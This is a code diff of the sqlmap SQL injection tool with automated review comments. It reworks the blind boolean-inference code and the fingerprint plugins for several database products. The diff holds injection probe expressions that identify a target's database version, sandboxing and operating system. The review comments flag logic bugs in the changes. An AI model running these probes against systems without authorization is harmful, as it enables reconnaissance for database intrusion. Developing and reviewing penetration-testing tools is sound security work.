diff --git a/lib/request/inject.py b/lib/request/inject.py index a77ce3991..f523ffaa5 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -97,15 +97,15 @@ def __goInferenceFields(expression, expressionFields, expressionFieldsList, payl return outputs def __goBooleanProxy(expression, resumeValue=True): - vector = kb.injection.data[kb.technique].vector - kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) - vector = vector.replace("[INFERENCE]", "%s" % expression) - vector = agent.cleanupPayload(vector) - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) + vector = kb.injection.data[kb.technique].vector + vector = vector.replace("[INFERENCE]", expression) + vector = agent.cleanupPayload(vector) + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) payload = agent.payload(newValue=query) + if resumeValue: output = resume(expression, payload) else: @@ -116,7 +116,6 @@ def __goBooleanProxy(expression, resumeValue=True): return output - def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, resumeValue=True, unpack=True, charsetType=None, firstChar=None, lastChar=None): """ Retrieve the output of a SQL query characted by character taking 
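Review bot: `__goBooleanProxy` no longer refreshes `kb.pageTemplate` before the comparison, while `__goInferenceProxy` in the same file still calls `getPageTemplate(...)` for the selected technique; if a boolean check is the first thing run for an injection point (as the fingerprint plugins in this commit do), the page is presumably compared against whatever template an earlier technique left behind, which can skew the true/false classification. If the template is now established elsewhere for the boolean technique, a one-line comment above `vector = kb.injection.data[kb.technique].vector` saying where would save the next reader the hunt; otherwise restore `kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place)`. The `else:` branch of the function continues outside the hunk.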
@@ -124,21 +123,16 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r parameter through a bisection algorithm. """ - if kb.technique and kb.injection.data[kb.technique].vector is not None: - vector = agent.cleanupPayload(kb.injection.data[kb.technique].vector) - kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) - else: - vector = queries[kb.misc.testedDbms].inference.query - kb.pageTemplate = kb.originalPage - - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - count = None - startLimit = 0 - stopLimit = None - outputs = [] - test = None + kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) + vector = agent.cleanupPayload(kb.injection.data[kb.technique].vector) + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + count = None + startLimit = 0 + stopLimit = None + outputs = [] + test = None untilLimitChar = None untilOrderChar = None @@ -161,7 +155,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: - infoMsg = "the SQL query provided has more than a field. " + infoMsg = "the SQL query provided has more than a field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" @@ -398,7 +392,7 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse (if selected). """ - if suppressOutput or expected == EXPECTED.BOOL: + if suppressOutput: pushValue(conf.verbose) conf.verbose = 0 
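Review bot: With the fallback removed, `__goInferenceProxy` dereferences `kb.injection.data[kb.technique]` unconditionally, so a call made before a technique has been selected (`kb.technique` unset, or not a key of `data`) now fails with a `KeyError`/`TypeError` deep in the bisection code instead of taking the former `queries[kb.misc.testedDbms].inference.query` path. Inside `getValue` the call is guarded by `kb.booleanTest`, but other callers of this function are not visible here. At minimum the new precondition should be stated above the first line of the body: `# precondition: the caller (getValue) has selected kb.technique and its vector is not None`. The function body continues past the hunk.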
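Review bot: The `pushValue(conf.verbose)` here and the `popValue()` in the `finally` block later in `getValue` are guarded by two separately written copies of the same condition, and this commit had to edit both to keep them in step; a future edit that touches only one leaves the value stack unbalanced and `conf.verbose` stuck at 0 for the rest of the run. Computing the flag once at the top of the function, `restoreVerbose = suppressOutput`, and testing that single name in both places makes the pairing robust. `getValue` begins before this hunk.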
@@ -414,6 +408,7 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression + if expression.upper().startswith("SELECT "): booleanExpression = expression[len("SELECT "):] else: @@ -421,35 +416,35 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse if inband and kb.unionTest is not None: kb.technique = PAYLOAD.TECHNIQUE.UNION + if expected == EXPECTED.BOOL: value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump) else: value = __goInband(query, expected, sort, resumeValue, unpack, dump) - found = value or (value is None and expectingNone) - if not found: - warnMsg = "for some reason(s) it was not possible to retrieve " - warnMsg += "the query output through inband SQL injection " - warnMsg += "technique, sqlmap is going blind" - logger.warn(warnMsg) + found = value or (value is None and expectingNone) oldParamNegative = kb.unionNegative kb.unionNegative = False if error and kb.errorTest and not found: kb.technique = PAYLOAD.TECHNIQUE.ERROR + if expected == EXPECTED.BOOL: value = __goError(forgeCaseExpression, resumeValue) else: value = __goError(query, resumeValue) + found = value or (value is None and expectingNone) if blind and kb.booleanTest and not found: kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN + if expected == EXPECTED.BOOL: value = __goBooleanProxy(booleanExpression, resumeValue) else: value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar) + found = value or (value is None and expectingNone) if time and (kb.timeTest or kb.stackedTest) and not found: 
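Review bot: Deleting the "sqlmap is going blind" warning after the inband attempt means a failed UNION retrieval now falls through to the error-based and boolean branches with no notice to the user, for every caller of `getValue` and not only the silenced fingerprint checks. If the aim was to quiet those probes, gate the warning instead of removing it: `if not found and not suppressOutput:` around the existing `logger.warn(warnMsg)`, keeping the message text. Separately, `found = value or (value is None and expectingNone)` treats `None` as success whenever `expectingNone` is set, which `checkBooleanExpression` in this commit now forces on; if `__goInband` also signals a retrieval failure with `None` (not visible here), boolean fingerprint checks would never reach the fallback techniques. `getValue` starts before this hunk and continues after it.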
@@ -472,12 +467,13 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse errMsg += "leveraged to retrieve queries output" raise sqlmapNotVulnerableException, errMsg finally: - if suppressOutput or expected == EXPECTED.BOOL: + if suppressOutput: conf.verbose = popValue() if value and expected == EXPECTED.BOOL: if isinstance(value, basestring): value = value.lower() + if value in ("true", "false"): value = bool(value) else: @@ -506,5 +502,5 @@ def goStacked(expression, silent=False): return payload, page -def checkBooleanExpression(expression, expectingNone=False): - return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, expectingNone=expectingNone) +def checkBooleanExpression(expression): + return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=True) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 50a748c92..6346714f4 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -42,7 +42,7 @@ class Fingerprint(GenericFingerprint): elif kb.dbmsVersion[0] in ("2002-2003", "2007"): table = "MSysAccessStorage" if table: - result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table, expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) retVal = "not sandboxed" if result else "sandboxed" return retVal @@ -69,7 +69,7 @@ class Fingerprint(GenericFingerprint): negate = True table = table[1:] randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) if result is None: result = False if negate: 
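Review bot: `value = bool(value)` on the context line before the closing `else:` turns the string `"false"` into `True`, since any non-empty string is truthy, so a boolean check whose retrieved result is rendered as `"false"` is reported as true; `value = value == "true"` gives the intended mapping. The defect is pre-existing, but this commit routes all fingerprint probes through the `expected == EXPECTED.BOOL` path, so it matters more than before; whether `"true"`/`"false"` actually occur depends on `forgeCaseExpression`, which is outside the hunk. The `else:` body also lies outside the hunk.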
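Review bot: Dropping the `expectingNone` parameter from `checkBooleanExpression` breaks any caller not updated in this commit (a stale `expectingNone=True` keyword now raises `TypeError`), and it also hard-wires every boolean check to treat a `None` result as a legitimate answer rather than a retrieval failure. Keeping the keyword with the new default preserves both behaviours: `def checkBooleanExpression(expression, expectingNone=True):` and `return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)`. A one-line docstring saying that the result is `None`/falsy when the expression could not be evaluated would help plugin authors who simply write `if result:`.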
@@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint): randInt = randomInt() randStr = randomStr() - _ = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt), expectingNone=True) + _ = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt)) if wasLastRequestDBMSError(): match = re.search("Could not find file\s+'([^']+?)'", kb.lastErrorPage[1]) @@ -154,13 +154,13 @@ class Fingerprint(GenericFingerprint): logMsg = "testing Microsoft Access" logger.info(logMsg) - result = inject.checkBooleanExpression("VAL(CVAR(1))=1", expectingNone=True) + result = inject.checkBooleanExpression("VAL(CVAR(1))=1") if result: logMsg = "confirming Microsoft Access" logger.info(logMsg) - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0", expectingNone=True) + result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") if not result: warnMsg = "the back-end DBMS is not Microsoft Access" diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 667dc0d5f..9eaf4c5ea 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -84,7 +84,7 @@ class Fingerprint(GenericFingerprint): version, checks = table[i] failed = False check = checks[randomRange(0,len(checks)-1)].replace("%d", getUnicode(randomRange(1,100))) - result = inject.checkBooleanExpression(check, expectingNone=True) + result = inject.checkBooleanExpression(check) if result: retVal = version else: @@ -98,7 +98,7 @@ class Fingerprint(GenericFingerprint): def __dialectCheck(self): retVal = None if kb.dbms: - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)", expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") retVal = "dialect 3" if result else "dialect 1" return retVal 
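Review bot: The pattern on the last line of the hunk, `re.search("Could not find file\s+'([^']+?)'", kb.lastErrorPage[1])`, uses `\s` inside a normal string literal and should be a raw string, `r"Could not find file\s+'([^']+?)'"`, so the escape survives any future change to the pattern. `match` is `None` when the error page does not contain that text; its use, and the rest of the method, lie outside the hunk.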
@@ -115,13 +115,13 @@ class Fingerprint(GenericFingerprint): logger.info(logMsg) randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt)) if result: logMsg = "confirming Firebird" logger.info(logMsg) - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") if not result: warnMsg = "the back-end DBMS is not Firebird" diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index f9a5286f7..6a62b9856 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -50,13 +50,13 @@ class Fingerprint(GenericFingerprint): minor, major = None, None for version in [6, 7]: - result = inject.checkBooleanExpression("(SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version) + result = inject.checkBooleanExpression("%d=(SELECT MAJORVERSION FROM SYSINFO.VERSION)" % version) if result: major = version for version in xrange(0, 10): - result = inject.checkBooleanExpression("(SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version) + result = inject.checkBooleanExpression("%d=(SELECT MINORVERSION FROM SYSINFO.VERSION)" % version) if result: minor = version 
@@ -113,13 +113,13 @@ class Fingerprint(GenericFingerprint): logger.info(logMsg) randInt = randomInt() - result = inject.checkBooleanExpression("NOROUND(%d)=%d" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("%d=NOROUND(%d)" % (randInt, randInt)) if result: logMsg = "confirming SAP MaxDB" logger.info(logMsg) - result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL", expectingNone=True) + result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") if not result: warnMsg = "the back-end DBMS is not SAP MaxDB" diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index f8da87cb7..572b41f62 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint): result = True else: randInt = randomInt() - result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) if result: infoMsg = "confirming Microsoft SQL Server" 
@@ -176,21 +176,19 @@ class Fingerprint(GenericFingerprint): # Get back-end DBMS underlying operating system version for version, data in versions.items(): - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%Windows NT " + data[0] + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): + infoMsg += " %s" % kb.osVersion kb.osVersion = version - infoMsg += " %s" % kb.osVersion - break if not kb.osVersion: kb.osVersion = "2003" - kb.osSP = 2 + kb.osSP = 2 - warnMsg = "unable to fingerprint the underlying operating " + warnMsg = "unable to fingerprint the underlying operating " warnMsg += "system version, assuming it is Windows " warnMsg += "%s Service Pack %d" % (kb.osVersion, kb.osSP) logger.warn(warnMsg) @@ -203,11 +201,10 @@ class Fingerprint(GenericFingerprint): sps = versions[kb.osVersion][1] for sp in sps: - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%Service Pack " + getUnicode(sp) + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): kb.osSP = sp break diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 2563dd7f9..092efd4c7 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py 
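Review bot: The new loop body appends `kb.osVersion` to `infoMsg` before assigning `version` to it, so the message carries the previous value (`None` on the first match) instead of the detected version; the old code assigned first. The `break` was also dropped, so the loop keeps issuing requests for every remaining entry and a later match silently overwrites the earlier one, and because `versions` is a dict the winner depends on iteration order. Inside the `if`, restore the order `kb.osVersion = version`, then `infoMsg += " %s" % kb.osVersion`, then `break`. The enclosing method continues outside the hunk.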
@@ -163,13 +163,13 @@ class Fingerprint(GenericFingerprint): logger.info(infoMsg) randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()", expectingNone=True) + result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()") if result: infoMsg = "confirming MySQL" logger.info(infoMsg) - result = inject.checkBooleanExpression("ISNULL(1/0)" if kb.injection.place != PLACE.URI else "ISNULL(1 DIV 0)", expectingNone=True) + result = inject.checkBooleanExpression("ISNULL(1 DIV 0)") if not result: warnMsg = "the back-end DBMS is not MySQL" @@ -178,7 +178,7 @@ class Fingerprint(GenericFingerprint): return False # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt)): kb.data.has_information_schema = True kb.dbmsVersion = [">= 5.0.0"] 
@@ -190,28 +190,28 @@ class Fingerprint(GenericFingerprint): return True # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0", expectingNone=True): + if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): kb.dbmsVersion = [">= 5.5.0"] # Check if it is MySQL >= 5.1.2 and < 5.5.0 - elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache", expectingNone=True): - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): + if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.1.12", "< 5.5.0"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt)): kb.dbmsVersion = [">= 5.1.7", "< 5.1.12"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = ["= 5.1.6"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"] else: kb.dbmsVersion = [">= 5.1.2", "< 5.1.5"] # Check if it is MySQL >= 5.0.0 and < 5.1.2 - elif inject.checkBooleanExpression("@@hostname=@@hostname", expectingNone=True): + elif inject.checkBooleanExpression("@@hostname=@@hostname"): kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"] - elif 
inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"] - elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()", expectingNone=True): + elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"] else: kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"] 
@@ -228,22 +228,22 @@ class Fingerprint(GenericFingerprint): return True # Check which version of MySQL < 5.0.0 it is - if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))", expectingNone=True): + if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"): kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"] - elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))", expectingNone=True): + elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"): kb.dbmsVersion = [">= 4.1.1", "< 4.1.11"] - elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()", expectingNone=True): + elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"): kb.dbmsVersion = [">= 4.0.6", "< 4.1.1"] - if inject.checkBooleanExpression("(SELECT CHARSET(CURRENT_USER()))='utf8'", expectingNone=True): + if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"): kb.dbmsVersion = ["= 4.1.0"] else: kb.dbmsVersion = [">= 4.0.6", "< 4.1.0"] - elif inject.checkBooleanExpression("0=(SELECT FOUND_ROWS()", expectingNone=True): + elif inject.checkBooleanExpression("0=(SELECT FOUND_ROWS())"): kb.dbmsVersion = [">= 4.0.0", "< 4.0.6"] - elif inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()", expectingNone=True): + elif inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()"): kb.dbmsVersion = [">= 3.23.14", "< 4.0.0"] - elif inject.checkBooleanExpression("USER()=USER()", expectingNone=True): + elif inject.checkBooleanExpression("USER()=USER()"): kb.dbmsVersion = [">= 3.22.11", "< 3.23.14"] else: kb.dbmsVersion = ["< 3.22.11"] @@ -262,7 +262,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "fingerprinting the back-end DBMS operating system" logger.info(infoMsg) - if inject.checkBooleanExpression("(SELECT MID(@@datadir, 1, 1))='/'"): + if inject.checkBooleanExpression("'/'=(SELECT MID(@@datadir, 1, 1))"): kb.os = "Linux" else: kb.os = "Windows" 
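Review bot: The OS probe at the end of the hunk maps every non-true outcome of `'/'=(SELECT MID(@@datadir, 1, 1))` to `kb.os = "Windows"`, including `None`; with the `expectingNone=True` that `checkBooleanExpression` now applies unconditionally, a probe that could not be evaluated at all is reported as Windows. Binding the result first lets the failure be told apart: `result = inject.checkBooleanExpression(...)`, then `kb.os = "Linux" if result else "Windows"`, with a `logger.warn` when `result is None`. The method continues past the hunk.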
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 408b85632..55f556fc1 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM", expectingNone=True) + result = inject.checkBooleanExpression("ROWNUM=ROWNUM") if result: logMsg = "confirming Oracle" @@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)", expectingNone=True) + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if not result: warnMsg = "the back-end DBMS is not Oracle" @@ -106,17 +106,13 @@ class Fingerprint(GenericFingerprint): if not conf.extensiveFp: return True - query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1" - version = inject.getValue(query, unpack=False, suppressOutput=True) + for version in ("11i", "10g", "9i", "8i"): + number = re.search("([\d]+)", version).group(1) + output = inject.checkBooleanExpression("%s=(SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % number) - if re.search("^11", version): - kb.dbmsVersion = ["11i"] - elif re.search("^10", version): - kb.dbmsVersion = ["10g"] - elif re.search("^9", version): - kb.dbmsVersion = ["9i"] - elif re.search("^8", version): - kb.dbmsVersion = ["8i"] + if output: + kb.dbmsVersion = [ version ] + break return True else: diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 053cc2eb9..d24a88854 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py 
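Review bot: The new probe compares a bare number with `SUBSTR((VERSION), 1, 2)`, which for the `9i`/`8i` cases yields `'9.'`/`'8.'`, so `9=(...)` relies on Oracle's implicit string-to-number conversion of `'9.'`; the regex `^9` it replaces did not. Comparing strings of matching length avoids the dependency: `"'%s'=(SELECT SUBSTR((VERSION), 1, %d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, len(number))`. The helper regex `"([\d]+)"` should be a raw string, `r"(\d+)"`, and iterating explicit `(prefix, label)` pairs would remove the need to re-derive the prefix at all. The method continues past `else:`, outside the hunk.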
@@ -85,14 +85,13 @@ class Fingerprint(GenericFingerprint): logger.info(infoMsg) randInt = getUnicode(randomInt(1)) - - result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt)) if result: infoMsg = "confirming PostgreSQL" logger.info(infoMsg) - result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt)) if not result: warnMsg = "the back-end DBMS is not PostgreSQL" 
@@ -107,33 +106,33 @@ class Fingerprint(GenericFingerprint): if not conf.extensiveFp: return True - if inject.getValue("SELECT DIV(6, 3)", unpack=False, charsetType=2, suppressOutput=True) == "2": + if inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"): kb.dbmsVersion = [">= 8.4.0"] elif inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)", unpack=False, charsetType=2, suppressOutput=True) in ( "1", "2" ) and not inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2, suppressOutput=True) in ( "1", "2" ): kb.dbmsVersion = [">= 8.3.0", "< 8.4"] elif inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2, suppressOutput=True): kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"] - elif inject.getValue("SELECT GREATEST(5, 9, 1)", unpack=False, charsetType=2, suppressOutput=True) == "9": + elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"): kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"] - elif inject.getValue("SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5)", unpack=False, charsetType=2, suppressOutput=True) == "3": + elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"): kb.dbmsVersion = [">= 8.0.0", "< 8.1.0"] - elif inject.getValue("SELECT SUBSTR(MD5('sqlmap'), 1, 1)", unpack=False, suppressOutput=True): + elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"): kb.dbmsVersion = [">= 7.4.0", "< 8.0.0"] - elif inject.getValue("SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1)", unpack=False, suppressOutput=True) == "p": + elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"): kb.dbmsVersion = [">= 7.3.0", "< 7.4.0"] - elif inject.getValue("SELECT BIT_LENGTH(1)") == "8": + elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): kb.dbmsVersion = [">= 7.2.0", "< 7.3.0"] - elif inject.getValue("SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1)", unpack=False, suppressOutput=True) == "a": + elif 
inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"): kb.dbmsVersion = [">= 7.1.0", "< 7.2.0"] - elif inject.getValue("SELECT POW(2, 3)", unpack=False, charsetType=2, suppressOutput=True) == "8": + elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"): kb.dbmsVersion = [">= 7.0.0", "< 7.1.0"] - elif inject.getValue("SELECT MAX('a')") == "a": + elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): kb.dbmsVersion = [">= 6.5.0", "< 6.5.3"] elif re.search("([\d\.]+)", inject.getValue("SELECT SUBSTR(VERSION(), 12, 5)", unpack=False, suppressOutput=True)): kb.dbmsVersion = [">= 6.4.0", "< 6.5.0"] - elif inject.getValue("SELECT SUBSTR(CURRENT_DATE, 1, 1)", unpack=False, charsetType=2, suppressOutput=True) == "2": + elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"): kb.dbmsVersion = [">= 6.3.0", "< 6.4.0"] - elif inject.getValue("SELECT SUBSTRING('sqlmap', 1, 1)", unpack=False, suppressOutput=True) == "s": + elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"): kb.dbmsVersion = [">= 6.2.0", "< 6.3.0"] else: kb.dbmsVersion = ["< 6.2.0"] @@ -160,11 +159,10 @@ class Fingerprint(GenericFingerprint): osWindows = ( " Visual C++", "mingw" ) for osPattern in osWindows: - query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%" + osPattern + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): kb.os = "Windows" break diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index c017f12ef..e6fc27b04 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py 
